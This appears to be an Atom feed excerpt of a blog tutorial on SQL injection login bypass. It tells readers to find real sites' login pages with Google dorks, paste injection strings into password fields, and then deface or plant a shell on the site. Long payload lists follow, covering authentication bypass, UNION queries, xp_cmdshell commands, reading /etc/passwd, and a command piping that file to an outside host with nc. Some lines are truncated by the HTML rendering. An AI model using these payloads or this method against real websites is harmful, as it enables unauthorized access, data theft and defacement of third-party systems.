&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;19&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;SELECT * FROM users &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;WHERE username = ‘admin’&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;AND password = ‘ ‘ or ‘1’=’1’ &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;```  &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;In the password field, we inserted a quote `&amp;apos;` first, then a bunch of random characters like &amp;quot;1&amp;quot;.  &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;The database always scans for rows and hence in the query we have executed, there&amp;apos;s only 1 row which states that there&amp;apos;s no reason for the login to be incorrect.   &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;However, some websites can filter out these type of queries, so it&amp;apos;s best to use different ones too. You can find some below.  &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Now that you have an idea of how Basic SQL injection queries work, lets try and put it to use shall we ?&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;## Step1: Finding websites with Login Pages&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Alright, out basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass it.  &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;For this, we can use dorks.  &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;In this tutorial, we can use these dorks:&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;inurl:/login.php&lt;br&gt;inurl:/admin.php&lt;br&gt;inurl:/admin&lt;br&gt;inurl:/login.html&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;If you want to find more dorks when using this method, you can find them here:&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;http://pastebin.com/ZjxpivV3&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://pastebin.com/ZjxpivV3&lt;/a&gt;&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;7&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;## Step2: Now Executing the query&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Alright, now that you&amp;apos;ve found your target with a log in page, lets play with it a bit.    &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;So here&amp;apos;s what you&amp;apos;re gonna do:  &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Username will be admin, cause most sites are having admin data stored in their databases&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Username: admin&lt;br&gt;Password: ‘ or 0=0 –&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Didn&amp;apos;t work? No worries, there&amp;apos;s more to that than just a single query.  &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Here&amp;apos;s a list of queried passwords you can use to hopefully inject the site.&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;‘ or ‘1’=’1&lt;br&gt;‘ or ‘x’=’x&lt;br&gt;‘ or 0=0 –&lt;br&gt;“ or 0=0 –&lt;br&gt;or 0=0 –&lt;br&gt;‘ or 0=0 #&lt;br&gt;“ or 0=0 #&lt;br&gt;or 0=0 #&lt;br&gt;‘ or ‘x’=’x&lt;br&gt;“ or “x”=”x&lt;br&gt;‘) or (‘x’=’x&lt;br&gt;‘ or 1=1–&lt;br&gt;“ or 1=1–&lt;br&gt;or 1=1–&lt;br&gt;‘ or a=a–&lt;br&gt;“ or “a”=”a&lt;br&gt;‘) or (‘a’=’a&lt;br&gt;“) or (“a”=”a&lt;br&gt;hi” or “a”=”a&lt;br&gt;hi” or 1=1 –&lt;br&gt;hi’ or 1=1 –&lt;/p&gt;
&lt;h1 id=&quot;‘or’1-1’&quot;&gt;&lt;a href=&quot;#‘or’1-1’&quot; class=&quot;headerlink&quot; title=&quot;‘or’1=1’&quot;&gt;&lt;/a&gt;‘or’1=1’&lt;/h1&gt;&lt;p&gt;and 1=1–&lt;br&gt;and 1=1&lt;br&gt;‘ or ‘one’=’one–&lt;br&gt;‘ or ‘one’=’one&lt;br&gt;‘ and ‘one’=’one&lt;br&gt;‘ and ‘one’=’one–&lt;br&gt;1’) and ‘1’=’1–&lt;br&gt;admin’ –&lt;br&gt;admin’ #&lt;br&gt;admin’/&lt;em&gt;&lt;br&gt;or 1=1–&lt;br&gt;or 1=1#&lt;br&gt;or 1=1/&lt;/em&gt;&lt;br&gt;) or ‘1’=’1–&lt;br&gt;) or (‘1’=’1–&lt;br&gt;‘ or ‘1’=’1&lt;br&gt;‘ or ‘x’=’x&lt;br&gt;‘ or 0=0 –&lt;br&gt;“ or 0=0 –&lt;br&gt;or 0=0 –&lt;br&gt;‘ or 0=0 #&lt;br&gt;“ or 0=0 #&lt;br&gt;or 0=0 #&lt;br&gt;‘ or ‘x’=’x&lt;br&gt;“ or “x”=”x&lt;br&gt;‘) or (‘x’=’x&lt;br&gt;‘ or 1=1–&lt;br&gt;“ or 1=1–&lt;br&gt;or 1=1–&lt;br&gt;‘ or a=a–&lt;br&gt;“ or “a”=”a&lt;br&gt;‘) or (‘a’=’a&lt;br&gt;“) or (“a”=”a&lt;br&gt;hi” or “a”=”a&lt;br&gt;hi” or 1=1 –&lt;br&gt;hi’ or 1=1 –&lt;br&gt;‘or’1=1’&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;15&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;gt; Note: Sometimes, this is not the best way of hacking websites with SQL injection but I guarantee, you&amp;apos;ll be a successful patient SQL injector and get used to this method.&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;## Step3: I LOGGED in, what to do now?!&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Well, first off, if you did login, then congratz on your first successful attempt of SQL injection.    &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;So, there are basically many things you can do with the site.  &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Most people would love to deface it.    &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Others will just shell it and have other uses such as rooting, webhosting etc.  &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;If would like to deface the website, locate the homepage and replace it with your deface page.  &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;## Extras&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;### Common Password Queries&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;admin’ –&lt;br&gt;admin’ #&lt;br&gt;admin’/&lt;em&gt;&lt;br&gt;‘ or 1=1–&lt;br&gt;‘ or 1=1#&lt;br&gt;‘ or 1=1/&lt;/em&gt;&lt;br&gt;‘) or ‘1’=’1–&lt;br&gt;‘) or (‘1’=’1–&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;### If version of Database is greater than 5&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;If version of Database is greater than 5, then queries with UNION,group, @@version,orderby,benchmark etc can be executed.&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;1234’ AND 1=0 UNION ALL SELECT ‘admin’&lt;br&gt;‘ HAVING 1=1 –&lt;br&gt;‘ GROUP BY table.columnfromerror1 HAVING 1=1 –&lt;br&gt;@@version&lt;br&gt;select @@version&lt;br&gt;select @@servername&lt;br&gt;select @@microsoftversion&lt;br&gt;select &lt;em&gt; from master..sysservers&lt;br&gt;select &lt;/em&gt; from sysusers&lt;br&gt;exec master..xp_cmdshell ‘ipconfig+/all’&lt;br&gt;exec master..xp_cmdshell ‘net+view’&lt;br&gt;exec master..xp_cmdshell ‘net+users’&lt;br&gt;SELECT 1 – comment&lt;br&gt;SELECT /&lt;em&gt;comment&lt;/em&gt;/1&lt;br&gt;ORDER BY 1–&lt;br&gt;‘ union all select sum(columntofind) from users–&lt;br&gt;UNION ALL SELECT null&lt;br&gt;SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = ‘tablenameforcolumnnames’)&lt;br&gt;SELECT TOP n columns&lt;br&gt;select &lt;em&gt; from OPENROWSET(‘MSDASQL’&lt;br&gt;select &lt;/em&gt; from OPENROWSET(‘SQLOLEDB’&lt;br&gt;masters..sysxlogins&lt;br&gt;sys.sql_logins&lt;br&gt;SELECT/&lt;em&gt;avoid-spaces&lt;/em&gt;/password/&lt;strong&gt;/FROM/&lt;/strong&gt;/Members&lt;br&gt;SELECT CHAR(0x66)&lt;br&gt;SELECT &lt;em&gt; FROM members&lt;br&gt;@@version&lt;br&gt;SELECT USER();&lt;br&gt;select host&lt;br&gt;SELECT 1;&lt;br&gt;SELECT /&lt;/em&gt;comment&lt;em&gt;/1;&lt;br&gt;ORDER BY 1–&lt;br&gt;UNION ALL SELECT null&lt;br&gt;SELECT schema_name FROM information_schema.schemata;&lt;br&gt;SELECT table_schema&lt;br&gt;SELECT grantee&lt;br&gt;limit 1&lt;br&gt;SELECT host&lt;br&gt;IF EXISTS (SELECT &lt;/em&gt; FROM users WHERE username = ‘root’) BENCHMARK(100&lt;br&gt;select benchmark( 500&lt;br&gt;SELECT CHAR(75)+CHAR(76)+CHAR(77)&lt;br&gt;SELECT ascii(‘A’)&lt;br&gt;SELECT CONCAT(‘0x’&lt;br&gt;SELECT/&lt;em&gt;avoid-spaces&lt;/em&gt;/password/&lt;strong&gt;/FROM/&lt;/strong&gt;/Members&lt;br&gt;SELECT /*!32302 1/0&lt;br&gt;SELECT 0x5045&lt;br&gt;SELECT cast(‘1’ AS unsigned integer);&lt;br&gt;SELECT cast(‘123’ AS char);&lt;br&gt;SELECT IF(1=1&lt;br&gt;‘ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) AND ‘a’=’a&lt;br&gt;union SELECT LOAD_FILE(0x2f6574632f706173737764)&lt;br&gt;load data infile ‘c:/boot.ini’ into table foo;&lt;/p&gt;
&lt;h1 id=&quot;SELECT-…-INTO-DUMPFILE&quot;&gt;&lt;a href=&quot;#SELECT-…-INTO-DUMPFILE&quot; class=&quot;headerlink&quot; title=&quot;SELECT … INTO DUMPFILE&quot;&gt;&lt;/a&gt;SELECT … INTO DUMPFILE&lt;/h1&gt;&lt;p&gt;SELECT login || ‘-‘ || password FROM members&lt;br&gt;select versionnumber&lt;br&gt;select user from sysibm.sysdummy1;&lt;br&gt;select session_user from sysibm.sysdummy1;&lt;br&gt;select system_user from sysibm.sysdummy1;&lt;br&gt;select &lt;em&gt; from syscat.tabauth;&lt;br&gt;select current server from sysibm.sysdummy1;&lt;br&gt;select &lt;/em&gt; from syscat.dbauth where grantee = current user;&lt;br&gt;select &lt;em&gt; from syscat.tdbauth where grantee = current user;&lt;br&gt;select name from sysibm.systables;&lt;br&gt;select name&lt;br&gt;SELECT schemaname FROM syscat.schemata;&lt;br&gt;SELECT foo FROM bar fetch first 1 rows only;&lt;br&gt;select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;&lt;br&gt;select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;&lt;br&gt;SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1;&lt;br&gt;SELECT cast(’123’ as integer) FROM sysibm.sysdummy1;&lt;br&gt;select version();&lt;br&gt;select current_database();&lt;br&gt;“select current_user;&lt;br&gt;select session_user;&lt;br&gt;“SELECT current_setting(‘data_directory’);&lt;br&gt;select current_setting(’log_connections’);&lt;br&gt;select current_setting(’log_statement’);&lt;br&gt;“select current_setting(’port’);&lt;br&gt;select current_setting(’password_encryption’);&lt;br&gt;select current_setting(’krb_server_keyfile’);&lt;br&gt;“select current_setting(’virtual_host’);&lt;br&gt;select current_setting(’port’);&lt;br&gt;“select current_setting(’config_file’);&lt;br&gt;“select current_setting(’hba_file’);&lt;br&gt;“select current_setting(’data_directory’);&lt;br&gt;LIMIT n&lt;br&gt;SELECT pg_sleep(10);&lt;br&gt;SELECT current_database()&lt;br&gt;SELECT relname&lt;br&gt;SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’&lt;br&gt;SELECT DISTINCT relname FROM pg_class C&lt;br&gt;SELECT 1; –comment&lt;br&gt;SELECT /&lt;/em&gt;comment&lt;em&gt;/1;&lt;br&gt;SELECT chr(65);&lt;br&gt;SELECT ascii(‘A’);&lt;br&gt;SELECT CHR(65)||CHR(66);&lt;br&gt;SELECT usename&lt;br&gt;SELECT usename FROM pg_user WHERE usesuper IS TRUE&lt;br&gt;SELECT system(‘cat /etc/passwd | nc 10.0.0.1 8080’);&lt;br&gt;SELECT ‘A’ || ‘B’;&lt;br&gt;SELECT CAST(1 as varchar);&lt;br&gt;SELECT CAST(‘1’ as int);&lt;br&gt;SELECT &lt;/em&gt; FROM dblink(‘host=put.your.hostname.here user=someuser  dbname=somedb’&lt;br&gt;select dbmsinfo(’_version’);&lt;br&gt;select dbmsinfo(’session_user’);&lt;br&gt;select dbmsinfo(’system_user’);&lt;br&gt;select dbmsinfo(’database’);&lt;br&gt;select dbmsinfo(’db_admin’);&lt;br&gt;select dbmsinfo(’create_table’);&lt;br&gt;select dbmsinfo(’create_procedure’);&lt;br&gt;select dbmsinfo(’security_priv’);&lt;br&gt;select dbmsinfo(’select_syscat’);&lt;br&gt;select dbmsinfo(’db_privileges’);&lt;br&gt;select dbmsinfo(’current_priv_mask’);&lt;br&gt;select top 10 blah from table;&lt;br&gt;select first 10 blah form table;&lt;br&gt;select table_name&lt;br&gt;select relid&lt;br&gt;select relid&lt;br&gt;select column_name&lt;br&gt;select 1 union select 2;&lt;br&gt;select cast(’123’ as integer);&lt;br&gt;select @@version”&lt;br&gt;select name from master..syslogins”&lt;br&gt;select name from master..sysdatabases”&lt;br&gt;convert(integer&lt;br&gt;waitfor delay ‘0:0:5’&lt;br&gt;```&lt;/p&gt;
</content>

    <summary type="html">

      &lt;h2 id=&quot;Preface&quot;&gt;&lt;a href=&quot;#Preface&quot; class=&quot;headerlink&quot; title=&quot;Preface&quot;&gt;&lt;/a&gt;Preface&lt;/h2&gt;&lt;p&gt;Alright in this tutorial, we’ll be learning how to

    </summary>

      <category term="A-SQLi" scheme="http://sec.php101.cn/categories/A-SQLi/"/>


      <category term="MegaSQLi" scheme="http://sec.php101.cn/tags/MegaSQLi/"/>

  </entry>

  <entry>
    <title>SQLi--PART I:Dorks</title>
    <link href="http://sec.php101.cn/2014/10/30/SQLi--PART%20I:Dorks/"/>
    <id>http://sec.php101.cn/2014/10/30/SQLi--PART I:Dorks/</id>
    <published>2014-10-30T09:44:32.000Z</published>